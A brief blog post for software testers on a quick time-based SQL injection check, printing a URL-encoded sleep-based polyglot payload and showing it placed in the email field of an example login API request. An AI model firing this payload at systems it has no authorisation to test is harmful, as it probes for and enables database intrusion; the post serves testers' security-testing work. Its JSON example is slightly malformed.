How to test SQL Injection Attack in 2 minutes?

It's high time Software testers are supposed to know about VAPT, XSS, and SQL Injection prevention tests. So basically how and where to start? The API's!
Grab any POST request, find any injection-prone key in request BODY and inject it with following in value:

if(now()%3dsysdate()%2csleep(15)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(15)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(15)%2c0))OR%22*/

For Example:

In case you have a login API request:

www.ishandevshukl.com/login
you can simply pass above SQL Injection in request Body JSON like:


"email": "if(now()%3dsysdate()%2csleep(15)%2c0)/*'XOR
(if(now()%3dsysdate()%2csleep(15)%2c0))OR'%22XOR
(if(now()%3dsysdate()%2csleep(15)%2c0))OR%22*/",
"passsword": "123456"
}

In case e-mail field is vulnerable and prone to SQL Injection it will delay API response to 20 seconds. All you need to do is identify the key and inject above attack. 

How to test SQL Injection Attack in 2 minutes? How to test SQL Injection Attack in 2 minutes? Reviewed by Ishan Dev Shukl on March 19, 2018 Rating: 5

No comments:

Thanks a lot for your valuable Comment!

Powered by Blogger.